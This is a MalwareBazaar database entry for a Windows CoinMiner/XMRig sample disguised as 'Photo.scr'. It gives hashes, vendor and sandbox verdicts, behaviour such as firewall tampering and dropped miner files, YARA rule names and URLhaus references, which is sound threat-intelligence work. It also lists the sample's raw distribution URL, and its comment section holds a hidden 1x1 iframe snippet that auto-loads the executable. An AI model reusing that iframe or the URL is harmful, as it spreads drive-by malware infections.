MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


CoinMiner


Vendor detections: 17


Intelligence 17 IOCs YARA 32 File information Comments 1
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
SHA3-384 hash: 31aeb3ca8da8dd11d269b6eb175bc868c1fe1b82d1800d19e1cc4691deb7ab0f9fe73ff2e2341af8cd2c4d53022173c2
SHA1 hash: 1f4d13fdd0bf0b0251b31b0afa2a9c2fb0b0140e
MD5 hash: 9f3069e77d062da63b7ba5c1f35e9937
humanhash: fish-juliet-seven-violet
File name:Photo.scr
Download: download sample
Signature CoinMiner
Create hunting rule
File size:6'227'160 bytes
First seen:2025-02-21 09:36:31 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 91ae93ed3ff0d6f8a4f22d2edd30a58e (48 x CoinMiner)
ssdeep 98304:RLJSThOfTCiFBXmfFs+JhEpCVoR8oMEOJ6Ty3RvX+UGD823FUuzmH:LBfTCiUs0VSLOJgyBGUA8Ch8
TLSH T1BD563345F4809837F139153625F884B2B07DBC7297244BDBA39E2AA56E317D83339A4E
TrID 38.7% (.EXE) Microsoft Visual C++ compiled executable (generic) (16529/12/5)
24.6% (.EXE) Win64 Executable (generic) (10522/11/4)
11.8% (.EXE) Win16 NE executable (generic) (5038/12/1)
10.5% (.EXE) Win32 Executable (generic) (4504/4/1)
4.7% (.EXE) OS/2 Executable (generic) (2029/13)
Magika pebin
dhash icon 7c70747474d67274 (47 x CoinMiner)
Reporter skocherhan
Tags:CoinMiner exe


Avatar
skocherhan
http://109.137.108.215:8083/Photo.scr

Intelligence

File Origin
# of uploads :
1
# of downloads :
266
Origin country :
GB GB
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
Video.scr
Verdict:
Malicious activity
Analysis date:
2024-07-25 06:09:18 UTC
Tags:
python upx mozi botnet ftp
Link:
https://app.any.run/tasks/e5973b0e-53f0-46e0-b50c-25e856e05361

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
Win.Malware.F857af-9776823-0
Create hunting rule

Win.Malware.F857af-9776825-0
Create hunting rule

Win.Malware.F857af-9776826-0
Create hunting rule

Win.Malware.F857af-9776827-0
Create hunting rule

Win.Malware.Ymacco-9950875-0
Create hunting rule

Win.Malware.Ymacco-9951150-0
Create hunting rule

SecuriteInfo.com.Python.Stealer.22.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=67b84a1328ab76d43a5c4095
Tags:
xmrig lien
Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a service
Creating a file in the Windows subdirectories
Searching for synchronization primitives
Launching cmd.exe command interpreter
DNS request
Sending a UDP request
Connection attempt
Сreating synchronization primitives
Sending a custom TCP request
Creating a file in the %temp% subdirectories
Restart of the analyzed sample
Running batch commands
Creating a process with a hidden window
Creating a file
Creating a process from a recently created file
Creating a service
Enabling autorun for a service
Launching the process to change the firewall settings
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-debug anti-vm coinminer compiled-script masquerade microsoft_visual_cc miner obfuscated overlay packed packed packed packer_detected pup pyinstaller pyinstaller stealer xmrig
Link:
https://www.filescan.io/uploads/67b849475b81efb9a696b646/reports/28ded65e-7bfd-4c74-9051-4bb9fc8f7532/overview
Verdict:
Malicious
Labled as:
Trojan.Generic
Link:
https://www.hybrid-analysis.com/sample/ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family:
XMRig Miner
Create hunting rule
Verdict:
Malicious
Link:
https://analyze.intezer.com/analyses/97b1a44d-623e-497a-9903-ff89d58a5439
Result
Threat name:
Xmrig
Create hunting rule
Detection:
malicious
Classification:
evad.mine
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1069121
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Creates files with lurking names (e.g. Crack.exe)
Drops PE files to the user root directory
Found API chain indicative of debugger detection
Machine Learning detection for sample
Modifies the windows firewall
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Uses netsh to modify the Windows network and firewall settings
Yara detected Xmrig cryptocurrency miner
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 701653 Sample: Photo.scr Startdate: 12/09/2022 Architecture: WINDOWS Score: 100 112 xmr.crypto-pool.fr 2->112 114 router.utorrent.com 2->114 116 4 other IPs or domains 2->116 128 Snort IDS alert for network traffic 2->128 130 Antivirus detection for dropped file 2->130 132 Antivirus / Scanner detection for submitted sample 2->132 134 4 other signatures 2->134 10 Photo.scr 35 2->10         started        14 HelpPane.exe 31 2->14         started        16 svchost.exe 2->16         started        18 7 other processes 2->18 signatures3 process4 file5 80 C:\Users\user\AppData\Local\...\xmrig.exe, PE32 10->80 dropped 82 C:\Users\user\...\ftpcrack.exe.manifest, XML 10->82 dropped 84 C:\Users\user\AppData\Local\...\config.json, ASCII 10->84 dropped 92 24 other files (none is malicious) 10->92 dropped 136 Found API chain indicative of debugger detection 10->136 138 Contains functionality to infect the boot sector 10->138 140 Creates files with lurking names (e.g. Crack.exe) 10->140 20 Photo.scr 10->20         started        86 C:\Windows\Temp\_MEI58082\xmrig.exe, PE32 14->86 dropped 88 C:\Windows\Temp\_MEI58082\config.json, ASCII 14->88 dropped 90 C:\Windows\Temp\_MEI58082\win32service.pyd, PE32 14->90 dropped 94 23 other files (none is malicious) 14->94 dropped 22 HelpPane.exe 2 14->22         started        142 Changes security center settings (notifications, updates, antivirus, firewall) 16->142 26 MpCmdRun.exe 16->26         started        signatures6 process7 dnsIp8 28 cmd.exe 1 20->28         started        30 cmd.exe 1 20->30         started        32 cmd.exe 3 20->32         started        118 185.64.121.221 XXLNETNL Netherlands 22->118 120 2.44.116.41 VODAFONE-IT-ASNIT Italy 22->120 122 98 other IPs or domains 22->122 78 C:\Windows\Temp\config, ASCII 22->78 dropped 36 xmrig.exe 22->36         started        38 cmd.exe 22->38         started        40 cmd.exe 22->40         started        44 2 other processes 22->44 42 conhost.exe 26->42         started        file9 process10 file11 46 HelpPane.exe 35 28->46         started        50 conhost.exe 28->50         started        52 HelpPane.exe 35 30->52         started        54 conhost.exe 30->54         started        70 C:\Users\user\HelpPane.exe, PE32 32->70 dropped 72 C:\Users\user\HelpPane.exe:Zone.Identifier, ASCII 32->72 dropped 124 Drops PE files to the user root directory 32->124 56 conhost.exe 32->56         started        126 Multi AV Scanner detection for dropped file 36->126 58 conhost.exe 36->58         started        74 C:\Windows\Temp\xmrig.exe, PE32 38->74 dropped 60 conhost.exe 38->60         started        76 C:\Windows\Temp\config.json, ASCII 40->76 dropped 62 conhost.exe 40->62         started        64 3 other processes 44->64 signatures12 process13 file14 96 C:\Users\user\AppData\Local\...\xmrig.exe, PE32 46->96 dropped 98 C:\Users\user\AppData\Local\Temp\...\back.jpg, PE32 46->98 dropped 100 C:\Users\user\...\ftpcrack.exe.manifest, XML 46->100 dropped 108 24 other files (1 malicious) 46->108 dropped 144 Multi AV Scanner detection for dropped file 46->144 146 Creates files with lurking names (e.g. Crack.exe) 46->146 148 Uses netsh to modify the Windows network and firewall settings 46->148 150 Modifies the windows firewall 46->150 66 HelpPane.exe 1 46->66         started        102 C:\Users\user\AppData\Local\...\xmrig.exe, PE32 52->102 dropped 104 C:\Users\user\...\ftpcrack.exe.manifest, XML 52->104 dropped 106 C:\Users\user\AppData\Local\...\config.json, ASCII 52->106 dropped 110 24 other files (none is malicious) 52->110 dropped 68 HelpPane.exe 52->68         started        signatures15 process16
Score:
98%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e/
Threat name:
Win32.Exploit.Phominer
Create hunting rule
Status:
Malicious
First seen:
2019-10-28 14:00:01 UTC
File Type:
PE (Exe)
Extracted files:
289
AV detection:
35 of 38 (92.11%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=5pg7knseps5cdgqtovwabsl3j3k75jd7fs7sfa7kq3uaefwtqixa._file
Result
Malware family:
xmrig
Create hunting rule
Score:
  10/10
Tags:
family:gozi family:xmrig banker defense_evasion discovery isfb miner persistence privilege_escalation pyinstaller trojan upx
Link:
https://tria.ge/reports/250221-llh74szrt9/
Behaviour
Checks SCSI registry key(s)
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Detects Pyinstaller
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
UPX packed file
ACProtect 1.3x - 1.4x DLL software
Executes dropped EXE
Loads dropped DLL
Boot or Logon Autostart Execution: Port Monitors
Contacts a large (1246) amount of remote hosts
Modifies Windows Firewall
Creates a large amount of network flows
XMRig Miner payload
Gozi
Gozi family
Xmrig family
xmrig
Verdict:
Malicious
Tags:
Win.Malware.F857af-9776823-0
YARA:
n/a
Link:
https://app.threat.zone/submission/99fccd21-f520-459e-aded-adfea6bf752b
Unpacked files
SH256 hash:
ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
MD5 hash:
9f3069e77d062da63b7ba5c1f35e9937
SHA1 hash:
1f4d13fdd0bf0b0251b31b0afa2a9c2fb0b0140e
Detections:
PyInstaller
Create hunting rule
Link:
https://www.unpac.me/results/c1c80bbc-df02-4cab-b9be-a594b78196c6/
SH256 hash:
7a74da389fbd10a710c294c2e914dc6f18e05f028f07958a2fa53ac44f0e4b90
MD5 hash:
d34a527493f39af4491b3e909dc697ca
SHA1 hash:
afee32fcd9ce160680371357a072f58c5f790d48
Link:
https://www.unpac.me/results/c1c80bbc-df02-4cab-b9be-a594b78196c6/
SH256 hash:
e82510adc44c4ea1fb0f22b1c3550d0a0152061e7489e5fbcf51952a55c8a4ce
MD5 hash:
a42c81a1edeeeed6a24de8b8cbeaf8f4
SHA1 hash:
7e904cfe7765a947e93a72d05354abdefbcba84c
Link:
https://www.unpac.me/results/c1c80bbc-df02-4cab-b9be-a594b78196c6/
SH256 hash:
05508fcece26d5de9205fab70af8e81297b145e5d8a812f03df1136de49dcd8a
MD5 hash:
808c7ba93a495d70a840680e852a2db3
SHA1 hash:
ea6a20629abd748613e2cc8f9897b568ae696639
Detections:
XMRig
Create hunting rule
PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20
Create hunting rule
MAL_XMR_Miner_May19_1
Create hunting rule
XMRIG_Monero_Miner
Create hunting rule
Link:
https://www.unpac.me/results/c1c80bbc-df02-4cab-b9be-a594b78196c6/
Parent samples :
ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
af94ddf7c35b9d9f016a5a4b232b43e071d59c6beb1560ba76df20df7b49ca4c
Malware family:
XMRig
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/ebcdf536447c/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:BLOWFISH_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for Blowfish constants
Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__ConsoleCtrl
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Disable_Defender
Create hunting rule
Author:iam-py-test
Description:Detect files disabling or modifying Windows Defender, Windows Firewall, or Microsoft Smartscreen
Rule name:golang_bin_JCorn_CSC846
Create hunting rule
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:ldpreload
Create hunting rule
Author:xorseed
Reference:https://stuff.rop.io/
Rule name:MAL_packer_lb_was_detected
Create hunting rule
Author:0x0d4y
Description:Detect the packer used by Lockbit4.0
Rule name:MAL_XMR_Miner_May19_1
Create hunting rule
Author:Florian Roth
Description:Detects Monero Crypto Coin Miner
Reference:https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Rule name:MAL_XMR_Miner_May19_1_RID2E1B
Create hunting rule
Author:Florian Roth
Description:Detects Monero Crypto Coin Miner
Reference:https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Rule name:MD5_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:pe_detect_tls_callbacks
Create hunting rule
Rule name:PE_File_pyinstaller
Create hunting rule
Author:Didier Stevens (https://DidierStevens.com)
Description:Detect PE file produced by pyinstaller
Reference:https://isc.sans.edu/diary/21057
Rule name:PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Detects XMRIG crypto coin miners
Reference:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Rule name:PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20_RID33BA
Create hunting rule
Author:Florian Roth
Description:Detects XMRIG crypto coin miners
Reference:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Rule name:PyInstaller
Create hunting rule
Author:@bartblaze
Description:Identifies executable converted using PyInstaller. This rule by itself does NOT necessarily mean the detected file is malicious.
Rule name:RANSOMWARE
Create hunting rule
Author:ToroGuitar
Rule name:RIPEMD160_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for RIPEMD-160 constants
Rule name:SEH__vectored
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:SHA1_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for SHA1 constants
Rule name:SHA512_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for SHA384/SHA512 constants
Rule name:suspicious_packer_section
Create hunting rule
Author:@j0sm1
Description:The packer/protector section names/keywords
Reference:http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Create hunting rule
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:ThreadControl__Context
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:UPXProtectorv10x2
Create hunting rule
Author:malware-lu
Rule name:UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
Create hunting rule
Author:malware-lu
Rule name:upx_largefile
Create hunting rule
Author:k3nr9
Rule name:WHIRLPOOL_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for WhirlPool constants
Rule name:XMRIG_Miner
Create hunting rule
Rule name:XMRIG_Monero_Miner
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Detects Monero mining software
Reference:https://github.com/xmrig/xmrig/releases
Rule name:xmrig_v1
Create hunting rule
Author:RandomMalware

File information

The table below shows additional information about this malware sample such as delivery method and external references.

  
Delivery method
Distributed via drive-by
  
URLhaus
https://urlhaus.abuse.ch/url/408131/
  
URLhaus
https://urlhaus.abuse.ch/url/2845994/
  
URLhaus
https://urlhaus.abuse.ch/url/2846001/
  
URLhaus
https://urlhaus.abuse.ch/url/2845985/
  
URLhaus
https://urlhaus.abuse.ch/url/2845992/
  
URLhaus
https://urlhaus.abuse.ch/url/2845973/
  
URLhaus
https://urlhaus.abuse.ch/url/2845965/
  
URLhaus
https://urlhaus.abuse.ch/url/2905209/
  
URLhaus
https://urlhaus.abuse.ch/url/2905208/
  
URLhaus
https://urlhaus.abuse.ch/url/2905256/
  
URLhaus
https://urlhaus.abuse.ch/url/2911133/
  
URLhaus
https://urlhaus.abuse.ch/url/2911207/
  
URLhaus
https://urlhaus.abuse.ch/url/2911222/
  
URLhaus
https://urlhaus.abuse.ch/url/2916320/
  
URLhaus
https://urlhaus.abuse.ch/url/2916321/
  
URLhaus
https://urlhaus.abuse.ch/url/2916322/
  
URLhaus
https://urlhaus.abuse.ch/url/2905160/
  
URLhaus
https://urlhaus.abuse.ch/url/2905152/
  
URLhaus
https://urlhaus.abuse.ch/url/2905148/
  
URLhaus
https://urlhaus.abuse.ch/url/2905146/
  
URLhaus
https://urlhaus.abuse.ch/url/2905162/
  
URLhaus
https://urlhaus.abuse.ch/url/3061028/
  
URLhaus
https://urlhaus.abuse.ch/url/3061029/
  
URLhaus
https://urlhaus.abuse.ch/url/3061030/
  
URLhaus
https://urlhaus.abuse.ch/url/2888255/
  
URLhaus
https://urlhaus.abuse.ch/url/2888258/
  
URLhaus
https://urlhaus.abuse.ch/url/2888254/
  
URLhaus
https://urlhaus.abuse.ch/url/2888259/
  
URLhaus
https://urlhaus.abuse.ch/url/2888253/
  
URLhaus
https://urlhaus.abuse.ch/url/2888257/
  
URLhaus
https://urlhaus.abuse.ch/url/2888267/
  
URLhaus
https://urlhaus.abuse.ch/url/2888266/
  
URLhaus
https://urlhaus.abuse.ch/url/2888264/
  
URLhaus
https://urlhaus.abuse.ch/url/2905158/
  
URLhaus
https://urlhaus.abuse.ch/url/2905159/
  
URLhaus
https://urlhaus.abuse.ch/url/2905140/
  
URLhaus
https://urlhaus.abuse.ch/url/3103415/
  
URLhaus
https://urlhaus.abuse.ch/url/3103416/
  
URLhaus
https://urlhaus.abuse.ch/url/3103417/
  
URLhaus
https://urlhaus.abuse.ch/url/3103418/
  
URLhaus
https://urlhaus.abuse.ch/url/3103419/
  
URLhaus
https://urlhaus.abuse.ch/url/3103420/
  
URLhaus
https://urlhaus.abuse.ch/url/3103488/
  
URLhaus
https://urlhaus.abuse.ch/url/3103492/
  
URLhaus
https://urlhaus.abuse.ch/url/2905150/
  
URLhaus
https://urlhaus.abuse.ch/url/3091659/
  
URLhaus
https://urlhaus.abuse.ch/url/3091697/
  
URLhaus
https://urlhaus.abuse.ch/url/2905154/
  
URLhaus
https://urlhaus.abuse.ch/url/3091771/
  
URLhaus
https://urlhaus.abuse.ch/url/3091766/
  
URLhaus
https://urlhaus.abuse.ch/url/3091770/
  
URLhaus
https://urlhaus.abuse.ch/url/3091772/
  
URLhaus
https://urlhaus.abuse.ch/url/3091774/
  
URLhaus
https://urlhaus.abuse.ch/url/3091773/
  
URLhaus
https://urlhaus.abuse.ch/url/3091767/
  
URLhaus
https://urlhaus.abuse.ch/url/3091776/
  
URLhaus
https://urlhaus.abuse.ch/url/3091768/
  
URLhaus
https://urlhaus.abuse.ch/url/3091769/
  
URLhaus
https://urlhaus.abuse.ch/url/3091775/
  
URLhaus
https://urlhaus.abuse.ch/url/3091765/
  
URLhaus
https://urlhaus.abuse.ch/url/3091753/
  
URLhaus
https://urlhaus.abuse.ch/url/2905133/
  
URLhaus
https://urlhaus.abuse.ch/url/2911215/
  
URLhaus
https://urlhaus.abuse.ch/url/3216270/
  
URLhaus
https://urlhaus.abuse.ch/url/3216442/
  
URLhaus
https://urlhaus.abuse.ch/url/3216264/
  
URLhaus
https://urlhaus.abuse.ch/url/3216262/
  
URLhaus
https://urlhaus.abuse.ch/url/3216284/
  
URLhaus
https://urlhaus.abuse.ch/url/3216311/
  
URLhaus
https://urlhaus.abuse.ch/url/2911202/
  
URLhaus
https://urlhaus.abuse.ch/url/3308860/
  
URLhaus
https://urlhaus.abuse.ch/url/3308914/
  
URLhaus
https://urlhaus.abuse.ch/url/3312821/
  
URLhaus
https://urlhaus.abuse.ch/url/3312837/
  
URLhaus
https://urlhaus.abuse.ch/url/3312841/
  
URLhaus
https://urlhaus.abuse.ch/url/3103489/
  
URLhaus
https://urlhaus.abuse.ch/url/2911150/
  
URLhaus
https://urlhaus.abuse.ch/url/3308912/
  
URLhaus
https://urlhaus.abuse.ch/url/3308866/
  
URLhaus
https://urlhaus.abuse.ch/url/3411630/
  
URLhaus
https://urlhaus.abuse.ch/url/3411636/
  
URLhaus
https://urlhaus.abuse.ch/url/3411612/

BLint

The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_DLL_CHARACTERISTICSMissing dll Security Characteristics (HIGH_ENTROPY_VA)high
Reviews
IDCapabilitiesEvidence
WIN32_PROCESS_APICan Create Process and ThreadsKERNEL32.dll::CreateProcessW
KERNEL32.dll::CloseHandle
WIN_BASE_APIUses Win Base APIKERNEL32.dll::TerminateProcess
KERNEL32.dll::LoadLibraryExW
KERNEL32.dll::LoadLibraryA
KERNEL32.dll::GetDriveTypeW
KERNEL32.dll::GetStartupInfoW
KERNEL32.dll::GetCommandLineW
KERNEL32.dll::GetCommandLineA
WIN_BASE_EXEC_APICan Execute other programsKERNEL32.dll::WriteConsoleW
KERNEL32.dll::ReadConsoleW
KERNEL32.dll::SetConsoleCtrlHandler
KERNEL32.dll::SetStdHandle
KERNEL32.dll::GetConsoleMode
KERNEL32.dll::GetConsoleCP
WIN_BASE_IO_APICan Create FilesKERNEL32.dll::CreateDirectoryW
KERNEL32.dll::CreateFileW
KERNEL32.dll::DeleteFileW
KERNEL32.dll::RemoveDirectoryW
KERNEL32.dll::SetDllDirectoryW

Comments


Avatar
commented on 2025-02-21 09:38:20 UTC

</html>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>